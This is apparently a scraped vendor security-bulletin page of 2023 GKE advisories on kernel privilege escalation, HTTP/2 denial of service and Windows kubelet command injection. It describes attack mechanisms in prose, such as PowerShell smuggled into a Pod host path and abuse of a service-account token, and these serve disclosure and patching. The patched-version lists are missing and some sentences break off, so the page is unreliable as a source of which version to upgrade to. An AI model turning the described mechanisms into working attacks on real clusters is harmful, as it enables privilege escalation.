GKE on Bare Metal
Description | Severity |
---|---|
Only GKE on Bare Metal clusters using Cloud Service Mesh are affected. What should I do?If your cluster uses in-cluster Cloud Service Mesh, you must manually upgrade to one of the following versions (release notes):
What vulnerabilities are addressed by this patch?The vulnerabilities addressed by this bulletin require an attacker to first either compromise or otherwise break out of a container or have root on a cluster Node. We are not aware of any existing vulnerabilities that would lead to this prerequisite condition for privilege escalation. We have patched these vulnerabilities as hardening measures to prevent a potential full attack chain in the future. Anthos Service Mesh required high privileges to make necessary modifications to a cluster's configuration including the ability to create and delete Pods. The researcher used Cloud Service Mesh's privileged Kubernetes service account token to escalate their initial compromised privileges by creating a new pod with cluster-admin privileges. We have redesigned the functionality of Cloud Service Mesh to remove excessive privileges. |
Medium |
GCP-2023-046
Published: 2023-11-22
Updated: 2024-03-04
Reference:
CVE-2023-5717
2024-03-04 Update: Added GKE versions for GKE on VMware.
2024-01-22 Update: Added Ubuntu patch versions.
GKE
Updated: 2024-01-22
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
GKE Standard and Autopilot clusters are impacted. Clusters using GKE Sandbox aren't impacted. What should I do?2024-01-22 Update: The following minor versions are affected. Upgrade your Ubuntu node pools to one of the following patch versions or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Updated: 2024-02-29
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do?2024-03-04 Update: The following versions of GKE on VMware are updated with code to fix this vulnerability. Upgrade your clusters to the following versions or later:
|
High |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do?There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2023-045
Published: 2023-11-20
Updated: 2023-12-21
Reference:
CVE-2023-5197
2023-12-21 Update: Clarify that GKE Autopilot clusters in the default configuration are not impacted.
GKE
Updated: 2023-12-21
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
2023-12-21 Update: The original bulletin stated Autopilot
clusters are impacted, but this was incorrect. GKE Autopilot
clusters in the default configuration are not impacted, but might be vulnerable if you
explicitly set the seccomp Unconfined profile or
allow GKE Standard and Autopilot clusters are impacted. Clusters using GKE Sandbox aren't impacted. What should I do?The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
The following minor versions are affected. Upgrade your Ubuntu node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do?There is no action required. GKE on Bare Metal aren't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2023-042
Published: 2023-11-13
Updated: 2023-11-15
Reference:
CVE-2023-4147
2023-11-15 Update: Clarify that only the listed minor versions need to upgrade to a corresponding patched version for GKE.
GKE
Updated: 2023-11-15
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
GKE Standard clusters are impacted. GKE Autopilot clusters aren't impacted. Clusters using GKE Sandbox aren't impacted. What should I do?2023-11-15 Update: You only need to upgrade to one of the patched versions that are listed in this bulletin if you use that minor version in your nodes. For example, if you use GKE version 1.27, you should upgrade to the corresponding patched version. However, if you use GKE version 1.24, you don't need to upgrade to a patched version. Upgrade your Container-Optimized OS node pools to one of the following versions or later:
Upgrade your Ubuntu node pools to one of the following versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patched version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do?There is no action required. GKE on Bare Metal aren't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2023-041
Published: 2023-11-08
Updated: 2023-11-21, 2023-12-05, 2023-12-21
Reference:
CVE-2023-4004
2023-12-21 Update: Clarify that GKE Autopilot clusters in the default configuration are not impacted.
2023-12-05 Update: Added additional GKE versions for Container-Optimized OS node pools.
2023-11-21 Update: Clarify that only the listed minor versions need to upgrade to a corresponding patch version for GKE.
GKE
Updated: 2023-11-21, 2023-12-05, 2023-12-21
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
2023-12-21 Update: The original bulletin stated Autopilot
clusters are impacted, but this was incorrect. GKE Autopilot
clusters in the default configuration are not impacted, but might be vulnerable if you
explicitly set the seccomp Unconfined profile or
allow Autopilot clusters are impacted. Clusters using GKE Sandbox are not impacted. What should I do?2023-12-05 Update: Some GKE versions were previously missing. The following is an updated list of GKE versions that you can update your Container-Optimized OS to:
2023-11-21 Update: You only need to upgrade to one of the patch versions that are listed in this bulletin if you use that minor version in your nodes. Minor versions that aren't listed aren't impacted. Upgrade your Container-Optimized OS node pools to one of the following versions or later:
Upgrade your Ubuntu node pools to one of the following versions or later:
|
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do?There is no action required. GKE on Bare Metal are not affected as it does not bundle an operating system in its distribution. |
None |
GCP-2023-040
Published: 2023-11-06
Updated: 2023-11-21, 2023-12-21
Reference:
CVE-2023-4921
2023-12-21 Update: Clarify that GKE Autopilot clusters in the default configuration are not impacted.
2023-11-21 Update: Clarify that only the listed minor versions need to upgrade to a corresponding patch version for GKE.
GKE
Updated: 2023-11-21, 2023-12-21
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
2023-12-21 Update: The original bulletin stated Autopilot
clusters are impacted, but this was incorrect. GKE Autopilot
clusters in the default configuration are not impacted, but might be vulnerable if you
explicitly set the seccomp Unconfined profile or
allow Autopilot clusters are impacted. Clusters using GKE Sandbox are not impacted. What should I do?2023-11-21 Update: You only need to upgrade to one of the patch versions that are listed in this bulletin if you use that minor version in your nodes. Minor versions that aren't listed aren't impacted. Upgrade your Container-Optimized OS node pools to one of the following versions or later:
Upgrade your Ubuntu node pools to one of the following versions or later:
|
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do?There is no action required. GKE on Bare Metal are not affected as it does not bundle an operating system in its distribution. |
None |
GCP-2023-039
Published: 2023-11-06
Updated: 2023-11-21, 2023-11-16
Reference:
CVE-2023-4622
2023-11-21 Update: Clarify that only the listed minor versions need to upgrade to a corresponding patch version for GKE.
2023-11-16 Update: The vulnerability associated with this security bulletin is CVE-2023-4622. CVE-2023-4623 was incorrectly listed as the vulnerability in a previous version of the security bulletin.
GKE
Updated: 2023-11-21, 2023-11-16
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
Autopilot clusters are impacted. Clusters using GKE Sandbox are not impacted. What should I do?2023-11-21 Update: You only need to upgrade to one of the patch versions that are listed in this bulletin if you use that minor version in your nodes. Minor versions that aren't listed aren't impacted. Upgrade your Container-Optimized OS node pools to one of the following versions or later:
Upgrade your Ubuntu node pools to one of the following versions or later:
|
High |
GKE on VMware
Updated: 2023-11-16
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on AWS
Updated: 2023-11-16
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Azure
Updated: 2023-11-16
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Bare Metal
Updated: 2023-11-16
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do?There is no action required. GKE on Bare Metal are not affected as it does not bundle an operating system in its distribution. |
None |
GCP-2023-038
Published: 2023-11-06
Updated: 2023-11-21, 2023-12-21
Reference:
CVE-2023-4623
2023-12-21 Update: Clarify that GKE Autopilot clusters in the default configuration are not impacted.
2023-11-21 Update: Clarify that only the listed minor versions need to upgrade to a corresponding patch version for GKE.
GKE
Updated: 2023-11-21, 2023-12-21
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
2023-12-21 Update: The original bulletin stated Autopilot
clusters are impacted, but this was incorrect. GKE Autopilot
clusters in the default configuration are not impacted, but might be vulnerable if you
explicitly set the seccomp Unconfined profile or
allow Autopilot clusters are impacted. Clusters using GKE Sandbox are not impacted. What should I do?2023-11-21 Update: You only need to upgrade to one of the patch versions that are listed in this bulletin if you use that minor version in your nodes. Minor versions that aren't listed aren't impacted. Upgrade your Container-Optimized OS node pools to one of the following versions or later:
Upgrade your Ubuntu node pools to one of the following versions or later:
|
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do?There is no action required. GKE on Bare Metal are not affected as it does not bundle an operating system in its distribution. |
None |
GCP-2023-037
Published: 2023-11-06
Updated: 2023-11-21, 2023-12-21
Reference:
CVE-2023-4015
2023-12-21 Update: Clarify that GKE Autopilot clusters in the default configuration are not impacted.
2023-11-21 Update: Clarify that only the listed minor versions need to upgrade to a corresponding patch version for GKE.
GKE
Updated: 2023-11-21, 2023-12-21
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
2023-12-21 Update: The original bulletin stated Autopilot
clusters are impacted, but this was incorrect. GKE Autopilot
clusters in the default configuration are not impacted, but might be vulnerable if you
explicitly set the seccomp Unconfined profile or
allow Autopilot clusters are impacted. Clusters using GKE Sandbox are not impacted. What should I do?2023-11-21 Update: You only need to upgrade to one of the patch versions that are listed in this bulletin if you use that minor version in your nodes. Minor versions that aren't listed aren't impacted. Upgrade your Container-Optimized OS node pools to one of the following versions or later:
Upgrade your Ubuntu node pools to one of the following versions or later:
|
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do?There is no action required. GKE on Bare Metal are not affected as it does not bundle an operating system in its distribution. |
None |
GCP-2023-035
Published: 2023-10-26
Updated: 2023-11-21, 2023-12-21
Reference:
CVE-2023-4206, CVE-2023-4207, CVE-2023-4208, CVE-2023-4128
2023-12-21 Update: Clarify that GKE Autopilot clusters in the default configuration are not impacted.
2023-11-21 Update: Clarify that only the listed minor versions need to upgrade to a corresponding patch version for GKE.
GKE
Updated: 2023-11-21, 2023-12-21
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
2023-12-21 Update: The original bulletin stated Autopilot
clusters are impacted, but this was incorrect. GKE Autopilot
clusters in the default configuration are not impacted, but might be vulnerable if you
explicitly set the seccomp Unconfined profile or
allow Autopilot clusters are impacted. Clusters using GKE Sandbox are not impacted. What should I do?2023-11-21 Update: You only need to upgrade to one of the patch versions that are listed in this bulletin if you use that minor version in your nodes. Minor versions that aren't listed aren't impacted. Upgrade your Container-Optimized OS node pools to one of the following versions or later:
Upgrade your Ubuntu node pools to one of the following versions or later:
|
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
High |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
High |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
High |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do?There is no action required. GKE on Bare Metal are not affected as it does not bundle an operating system in its distribution. |
High |
GCP-2023-033
Published: 2023-10-24
Updated: 2023-11-21, 2023-12-21
Reference:
CVE-2023-3777
2023-12-21 Update: Clarify that GKE Autopilot clusters in the default configuration are not impacted and GKE Sandbox workloads are not impacted.
2023-11-21 Update: Clarify that only the listed minor versions need to upgrade to a corresponding patch version for GKE.
GKE
Updated: 2023-11-21, 2023-12-21
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
2023-12-21 Update: The original bulletin stated Autopilot
clusters are impacted, but this was incorrect. GKE Autopilot
clusters in the default configuration are not impacted, but might be vulnerable if you
explicitly set the seccomp Unconfined profile or
allow Autopilot clusters are impacted. Clusters that use GKE Sandbox are impacted. What should I do?2023-11-21 Update: You only need to upgrade to one of the patch versions that are listed in this bulletin if you use that minor version in your nodes. Minor versions that aren't listed aren't impacted. Upgrade your Container-Optimized OS node pools to one of the following versions or later:
Upgrade your Ubuntu node pools to one of the following versions or later:
|
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do?There is no action required. GKE on Bare Metal is not affected as it does not bundle an operating system in its distribution. |
GCP-2023-030
Published: 2023-10-10
Updated: 2024-03-20
Reference: CVE-2023-44487CVE-2023-39325
2024-03-20 Update: Added patch versions for GKE on AWS and GKE on Azure
2024-02-14 Update: Added patch versions
for GKE on VMware
2023-11-09 Update: Added CVE-2023-39325. Updated GKE versions
with the latest patches for CVE-2023-44487 and CVE-2023-39325.
GKE
Updated: 2023-11-09
Description | Severity |
---|---|
A Denial-of-Service (DoS) vulnerability was recently discovered in multiple implementations of the HTTP/2 protocol (CVE-2023-44487), including the golang HTTP server used by Kubernetes. The vulnerability could lead to a DoS of the Google Kubernetes Engine (GKE) control plane. GKE clusters with authorized networks configured are protected by limiting network access, but all other clusters are affected. What should I do?2023-11-09 Update: We have released new versions of GKE that include the Go and Kubernetes security patches, which you can update your clusters to now. In the coming weeks we will release additional changes to the GKE control plane to further mitigate this issue. The following GKE versions have been updated with patches for CVE-2023-44487 and CVE-2023-39325:
We recommend that you apply the following mitigation as soon as possible and upgrade to the latest patched version when available. Golang patches will be released on October 10. Once available, we will build and qualify a new Kubernetes API server with those patches and make a GKE patched release. Once the GKE release is available, we will update this bulletin with guidance on which version to upgrade your control plane, and also make the patches visible within GKE GKE security posture when available for your cluster. To receive a Pub/Sub notification when a patch is available for your channel, enable cluster notifications. A recent feature of release channels allows you to apply a patch without having to unsubscribe from a channel. This lets you secure your nodes until the new version becomes the default for your release specific channel. Mitigate by configuring authorized networks for control plane access: You can add authorized networks for existing clusters. To learn more see, authorized network for existing clusters. In addition to the authorized networks you add, there are preset IP addresses that can access the GKE control plane. To learn more about these addresses, see Access to control plane endpoints. The following items summarize the cluster isolation:
What vulnerabilities are addressed by this patch?The vulnerability, CVE-2023-44487, allows an attacker to execute a denial-of-service attack on GKE control plane nodes. |
High |
GKE on VMware
Updated: 2024-02-14
Description | Severity |
---|---|
A Denial-of-Service (DoS) vulnerability was recently discovered in multiple implementations of the HTTP/2 protocol (CVE-2023-44487), including the golang HTTP server used by Kubernetes. The vulnerability could lead to a DoS of the Kubernetes control plane. GKE on VMware creates Kubernetes clusters that are not directly accessible to the Internet by default and are protected from this vulnerability. What should I do?2024-02-14 Update: The following versions of GKE on VMware are updated with code to fix this vulnerability. Upgrade your clusters to the following patch versions or later:
If you have configured your GKE on VMware Kubernetes clusters to have direct access to the Internet or other untrusted networks, we recommend working with your firewall administrator to block or limit that access. We recommend that you upgrade to the latest patch version, when available, as soon as possible. Golang patches will be released on October 10. Once available, we will build and qualify a new Kubernetes API server with those patches and make a GKE patched release. Once the GKE release is available, we will update this bulletin with guidance on which version to upgrade your control plane to. What vulnerabilities are addressed by this patch?The vulnerability, CVE-2023-44487, allows an attacker to execute a denial-of-service attack on Kubernetes control plane nodes. |
High |
GKE on AWS
Description | Severity |
---|---|
A Denial-of-Service (DoS) vulnerability was recently discovered in multiple implementations of the HTTP/2 protocol (CVE-2023-44487), including the golang HTTP server used by Kubernetes. The vulnerability could lead to a DoS of the Kubernetes control plane. GKE on AWS creates private Kubernetes clusters that are not directly accessible to the Internet by default and are protected from this vulnerability. What should I do?2024-03-20 Update: The following GKE on AWS versions have been updated with patches for CVE-2023-44487:
If you have configured your GKE on AWS to have direct access to the Internet or other untrusted networks, we recommend working with your firewall administrator to block or limit that access. We recommend that you upgrade to the latest patch version, when available, as soon as possible. Golang patches will be released on October 10. Once available, we will build and qualify a new Kubernetes API server with those patches and make a GKE patched release. Once the GKE release is available, we will update this bulletin with guidance on which version to upgrade your control plane to. What vulnerabilities are addressed by this patch?The vulnerability, CVE-2023-44487, allows an attacker to execute a denial-of-service attack on Kubernetes control plane nodes. |
High |
GKE on Azure
Description | Severity |
---|---|
A Denial-of-Service (DoS) vulnerability was recently discovered in multiple implementations of the HTTP/2 protocol (CVE-2023-44487), including the golang HTTP server used by Kubernetes. The vulnerability could lead to a DoS of the Kubernetes control plane. GKE on Azure creates private Kubernetes clusters that are not directly accessible to the Internet by default and are protected from this vulnerability. What should I do?2024-03-20 Update: The following GKE on Azure versions have been updated with patches for CVE-2023-44487:
If you have configured your GKE on Azure clusters to have direct access to the Internet or other untrusted networks, we recommend working with your firewall administrator to block or limit that access. We recommend that you upgrade to the latest patch version, when available, as soon as possible. Golang patches will be released on October 10. Once available, we will build and qualify a new Kubernetes API server with those patches and make a GKE patched release. Once the GKE release is available, we will update this bulletin with guidance on which version to upgrade your control plane to.What vulnerabilities are addressed by this patch?The vulnerability, CVE-2023-44487, allows an attacker to execute a denial-of-service attack on Kubernetes control plane nodes. |
High |
GKE on Bare Metal
Description | Severity |
---|---|
A Denial-of-Service (DoS) vulnerability was recently discovered in multiple implementations of the HTTP/2 protocol (CVE-2023-44487), including the golang HTTP server used by Kubernetes. The vulnerability could lead to a DoS of the Kubernetes control plane. Anthos on Bare Metal creates Kubernetes clusters that are not directly accessible to the Internet by default and are protected from this vulnerability. What should I do?If you have configured your Anthos on Bare Metal Kubernetes clusters to have direct access to the Internet or other untrusted networks, we recommend working with your firewall administrator to block or limit that access. To learn more, see the GKE on Bare Metal security overview. We recommend that you upgrade to the latest patch version, when available, as soon as possible. Golang patches will be released on October 10. Once available, we will build and qualify a new Kubernetes API server with those patches and make a GKE patched release. Once the GKE release is available, we will update this bulletin with guidance on which version to upgrade your control plane to. What vulnerabilities are addressed by this patch?The vulnerability, CVE-2023-44487, allows an attacker to execute a denial-of-service attack on Kubernetes control plane nodes. |
High |
GCP-2023-026
Published: 2023-09-06
Reference: CVE-2023-3676,
CVE-2023-3955,
CVE-2023-3893
GKE
Description | Severity |
---|---|
Three vulnerabilities (CVE-2023-3676, CVE-2023-3955, CVE-2023-3893) have been discovered in Kubernetes where a user that can create Pods on Windows nodes may be able to escalate to admin privileges on those nodes. These vulnerabilities affect the Windows versions of Kubelet and the Kubernetes CSI proxy. GKE clusters are only affected if they include Windows nodes. What should I do?The following versions of GKE have been updated with code to fix this vulnerability. For security purposes, even if you have node auto-upgrade enabled, we recommend that you manually upgrade your cluster and node pools to one of the following GKE versions:
The GKE control plane will be updated the week of 2023-09-04 to update the
csi-proxy to version 1.1.3. If you update your nodes prior to the control plane update,
you will need to update your nodes again after the update to take advantage of the new
proxy. You can update the nodes again, even without changing the node version, by running
the A recent feature of release channels allows you to apply a patch without having to unsubscribe from a channel. This lets you secure your nodes until the new version becomes the default for your specific release channel. What vulnerabilities are addressed by this patch?With CVE-2023-3676, a malicious actor could craft a Pod spec with host path strings that contain PowerShell commands. Kubelet lacks input sanitization and passes this crafted path string to the command executor as an argument where it would execute parts of the string as separate commands. These commands would run with the same administrative privileges as Kubelet has. With CVE-2023-3955, Kubelet grants users who can create Pods the ability to execute code at the same permission level as the Kubelet agent, privileged permissions. With CVE-2023-3893, a similar lack of input sanitation lets a user who can create Pods on Windows nodes running kubernetes-csi-proxy to escalate to admin privileges on those nodes. Kubernetes audit logs can be used to detect if this vulnerability is being exploited. Pod create events with embedded PowerShell commands are a strong indication of exploitation. ConfigMaps and Secrets that contain embedded PowerShell commands and are mounted into Pods are also a strong indication of exploitation. |
High |
GKE on VMware
Description | Severity |
---|---|
Three vulnerabilities (CVE-2023-3676, CVE-2023-3955, CVE-2023-3893) have been discovered in Kubernetes where a user that can create Pods on Windows nodes may be able to escalate to admin privileges on those nodes. These vulnerabilities affect the Windows versions of Kubelet and the Kubernetes CSI proxy. Clusters are only affected if they include Windows nodes. What should I do?What vulnerabilities are addressed by this patch?With CVE-2023-3676, a malicious actor could craft a Pod spec with host path strings that contain PowerShell commands. Kubelet lacks input sanitization and passes this crafted path string to the command executor as an argument where it would execute parts of the string as separate commands. These commands would run with the same administrative privileges as Kubelet has. With CVE-2023-3955, Kubelet grants users who can create Pods the ability to execute code at the same permission level as the Kubelet agent, privileged permissions. With CVE-2023-3893, a similar lack of input sanitation lets a user who can create Pods on Windows nodes running kubernetes-csi-proxy to escalate to admin privileges on those nodes. Kubernetes audit logs can be used to detect if this vulnerability is being exploited. Pod create events with embedded PowerShell commands are a strong indication of exploitation. ConfigMaps and Secrets that contain embedded PowerShell commands and are mounted into Pods are also a strong indication of exploitation. |
High |
GKE on AWS
Description | Severity |
---|---|
Three vulnerabilities (CVE-2023-3676, CVE-2023-3955, CVE-2023-3893) have been discovered in Kubernetes where a user that can create Pods on Windows nodes may be able to escalate to admin privileges on those nodes. These vulnerabilities affect the Windows versions of Kubelet and the Kubernetes CSI proxy. What should I do?GKE on AWS is not affected by these CVEs. No action is required. |
None |
GKE on Azure
Description | Severity |
---|---|
Three vulnerabilities (CVE-2023-3676, CVE-2023-3955, CVE-2023-3893) have been discovered in Kubernetes where a user that can create Pods on Windows nodes may be able to escalate to admin privileges on those nodes. These vulnerabilities affect the Windows versions of Kubelet and the Kubernetes CSI proxy. What should I do?GKE on Azure is not affected by these CVEs. No action is required. |
None |
GKE on Bare Metal
Description | Severity |
---|---|
Three vulnerabilities (CVE-2023-3676, CVE-2023-3955, CVE-2023-3893) have been discovered in Kubernetes where a user that can create Pods on Windows nodes may be able to escalate to admin privileges on those nodes. These vulnerabilities affect the Windows versions of Kubelet and the Kubernetes CSI proxy. What should I do?GKE on Bare Metal is not affected by these CVEs. No action is required. |
None |
GCP-2023-018
Published: 2023-06-27
Reference: CVE-2023-2235
GKE
Description | Severity |
---|---|
A new vulnerability (CVE-2023-2235) has been discovered in the Linux kernel that can lead to a privilege escalation on the node. GKE Autopilot clusters are affected as GKE Autopilot nodes always use Container-Optimized OS node images. GKE Standard clusters with versions 1.25 or later that are running Container-Optimized OS node images are affected. GKE clusters are not affected if they are running only Ubuntu node images, or running versions before 1.25, or using GKE Sandbox. What should I do?The following versions of GKE have been updated with code to fix this vulnerability. For security purposes, even if you have node auto-upgrade enabled, we recommend that you manually upgrade your cluster and node pools to one of the following GKE versions:
A recent feature of release channels allows you to apply a patch without having to unsubscribe from a channel. This lets you secure your nodes until the new version becomes the default for your release specific channel. What vulnerabilities are being addressed?With CVE-2023-2235, the perf_group_detach function did not check the event's siblings' attach_state before calling add_event_to_groups(), but remove_on_exec made it possible to call list_del_event() on before detaching from their group, making it possible to use a dangling pointer causing a use-after-free vulnerability. |
High |
GKE on VMware
Description | Severity |
---|---|
A new vulnerability (CVE-2023-2235) has been discovered in the Linux kernel that can lead to a privilege escalation on the node. GKE on VMware clusters are affected. What should I do?What vulnerabilities are being addressed?With CVE-2023-2235, the perf_group_detach function did not check the event's siblings' attach_state before calling add_event_to_groups(), but remove_on_exec made it possible to call list_del_event() on before detaching from their group, making it possible to use a dangling pointer causing a use-after-free vulnerability. |
High |
GKE on AWS
Description | Severity |
---|---|
A new vulnerability (CVE-2023-2235) has been discovered in the Linux kernel that can lead to a privilege escalation on the node. GKE on AWS clusters are affected. What should I do?What vulnerabilities are addressed by this patch?With CVE-2023-2235, the perf_group_detach function did not check the event's siblings' attach_state before calling add_event_to_groups(), but remove_on_exec made it possible to call list_del_event() on before detaching from their group, making it possible to use a dangling pointer causing a use-after-free vulnerability. |
High |
GKE on Azure
Description | Severity |
---|---|
A new vulnerability (CVE-2023-2235) has been discovered in the Linux kernel that can lead to a privilege escalation on the node. GKE on Azure clusters are affected. What should I do?What vulnerabilities are addressed by this patch?With CVE-2023-2235, the perf_group_detach function did not check the event's siblings' attach_state before calling add_event_to_groups(), but remove_on_exec made it possible to call list_del_event() on before detaching from their group, making it possible to use a dangling pointer causing a use-after-free vulnerability. |
High |
GKE on Bare Metal
Description | Severity |
---|---|
